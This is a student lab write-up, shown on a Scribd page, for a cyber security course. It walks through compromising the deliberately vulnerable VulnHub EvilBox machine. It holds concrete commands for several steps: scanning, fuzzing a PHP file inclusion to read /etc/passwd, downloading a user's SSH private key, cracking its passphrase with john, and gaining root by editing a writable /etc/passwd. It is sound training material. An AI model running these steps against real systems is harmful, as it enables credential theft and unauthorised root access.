Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 9 views

    Lab Assignment 05a

    Uploaded by

    Pradip Sarker
    Cyber Security51

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Lab Assignment 05a

    Uploaded by

    Pradip Sarker
    9 views13 pages
    Cyber Security51

    Original Title

    24525201005_Lab_Assignment_05a

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Cyber Security51

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    9 views13 pages

    Lab Assignment 05a

    Uploaded by

    Pradip Sarker
    Cyber Security51

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 13

    Bangladesh University of Professionals (BUP)

    M.Sc. in Cyber Security

    Course Code: MCS 1101


    Course Name: Cyber Security Fundamentals

    Lab Assignment No: 05a

    Penetration Testing EvilBox

    Submitted To: Submitted By:


    Engr. Md. Mushfiqur Rahman Sree Pradip Kumer Sarker
    ID No: 24525201005
    Guest Faculty, Dept of CE
    M.Sc. in Cyber Security
    Bangladesh University of Professionals (BUP)
    BUP, Dhaka, Bangladesh.
    Dhaka, Bangladesh.

    1
    Penetration Testing EvilBox

    First download the Evilbox machine from this link:


    https://www.vulnhub.com/entry/evilbox-one,736/
    now start both vulnhub and parrot machines putting them on the same network.
    Now from parrot scan for available ip’s from the network block to find the ip of the evil-box using
    netdiscover.
    #netdiscover -r 192.168.100.0/24

    We can also use fping to see available ip addresses which we can reach:
    #fping -aqg 192.168.100.0/24
    -a: Show only the hosts that are alive.
    -q: Quiet output. Only displays the summary or results.
    -g: Generate a list of IPs from the given IP range or subnet.

    2
    This is fast and flexible and simple.
    Lets scan for open ports in this ip which is 192.168.100.10, or we can scan for all to see which one has
    open ports .
    #Nmap -sC -sV 192.168.100.10

    #nmap -v -T4 -p- -A -oN nmap.log 192.168.100.10

    3
    nmap: The network scanning tool.
    -v: Increase verbosity, providing more detailed output.
    -T4: Set the timing template to 4 (Aggressive), which speeds up the scan.
    -p-: Scan all 65,535 ports.
    -A: Enable OS detection, version detection, script scanning, and traceroute.
    -oN nmap.log: Output the results in normal format to the file nmap.log.

    This port scan gives us idea on which ports its is serving and which ports are open which os version is
    running which version of service is running etc.
    Now we can see there are 2 ports are open : 22 and 80.
    We can for directories in the port 80 web server ,first we see if the web server is enabled or not.

    So its opne . Now we search for directories via directory brute force using gobuster:

    4
    #gobuster dir -u http://192.168.100.10 -w /usr/share/wordlists/directory-list-2.3-medium.txt -x
    php,html,txt -o dir.log
    gobuster: The tool used for brute forcing URIs (directories and files) in web servers.
    dir: The mode to use, in this case, directory brute forcing.
    -r: Follow redirects.
    -u http://10.0.0.12/: The URL of the target web server.
    -w /usr/share/wordlists/directory-list-2.3-medium.txt: The wordlist to use for brute forcing.
    -x php,html,txt: The file extensions to append to each wordlist entry.
    -o dir.log: Output the results to the file dir.log.

    Here we get index.html,robots.txt,/secret folder and /server-status folder.

    5
    Now we scan for folders and files in other two directories we found .

    We found a evil.php file in secret directory. We need to fuzz scan the file to find secret elements via this
    file . To do that we need to install go lang and fuff fuzzer in parrot.
    #apt update
    #apt install golang
    #go install github.com/ffuf/ffuf/v2@latest
    # nano .bashrc
    #add line : export PATH=$PATH:$HOME/go/bin . save and come out.
    #source .bashrc

    Or we can just write:


    #apt install ffuf
    Now we fuzz the php file to get hidden parameters with it if available using ffuf:
    #ffuf -c -r -u 'http://10.0.0.12/secret/evil.php?FUZZ=/etc/passwd' -w
    /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
    ffuf: The tool being used.
    -c: Colorize the output.
    -r: Follow redirects.
    -u 'http://10.0.0.12/secret/evil.php?FUZZ=/etc/passwd': The target URL with FUZZ as the placeholder
    for the fuzzing input.
    -w /usr/share/seclists/Discovery/Web-Content/common.txt: The wordlist to use for fuzzing.
    -fs 0: Filter out results with a response size of 0 bytes.

    6
    Here we got we can use command in the place of FUZZ . Lets try it and try to open the /etc/passwd file
    where password info’s are saved.

    Now to get the source code of the evil.php we can use curl or from url, we can get the page in encoded
    mode because the web server executes php file rather than outputting like text.

    7
    PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKC
    RmaWxlbmFtZSk7Cj8+Cg==
    So this is the base64 converted php file we got. Now we will decode this base64 code and get the evil.php
    source code.
    #base64 -d <<<
    PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKC
    RmaWxlbmFtZSk7Cj8+Cg==

    This is the php code written in evil.php file.


    Now from the passwd file we got a user mowree .We will use its home directory to find personal files
    which may help us to exploit the target.

    #http://192.168.100.10/secret/evil.php?command=/home/mowree/.ssh/id_rsa
    From here we got a rsa private key,.

    8
    Now to get this id in our machine we can use wget .
    #wget ‘http://192.168.100.10/secret/evil.php?command=/home/mowree/.ssh/id_rsa’
    Now to crack the key we need to first change the exec mode of this file .
    #chmod 600 id_rsa

    Now to crack the passphrase we use john the reaper .


    To convert the file we need a .py script to convert it named ssh2john.py.

    For key word list download rockyou.txt

    9
    So this is the passphrase matching with the hash of id_rsa file .
    Now let use this key to get into the server using its user “mowree”.

    #ssh mowree@192.168.100.10 -i id_rsa

    10
    Here we can see we got the shell of the EvilBox server using its rsa private key.
    Now we want to escalate the user to root so we need to hash the ‘root’ and replace it on the please of ‘x’
    beside root in the /etc/passwd file .

    11
    Here we hash the word ‘root’ using openssl.
    Before putting it /etc/passwd file we tried to enter root using different password.

    Here we failed . Now we will take the hash value of the word ‘root’ and paste it in /etc/passwd file beside
    root: in the place of x.
    #nano /etc/passwd

    12
    We are now trying to get into the super user by using ‘root’ as password which we entered in /etc/passwd
    file , able to edit this file from other users which is vulnerable like mowree can be make it vulnerable too.
    So the ownership of this file and editing permission of this file must be preserved well.

    13

    You might also like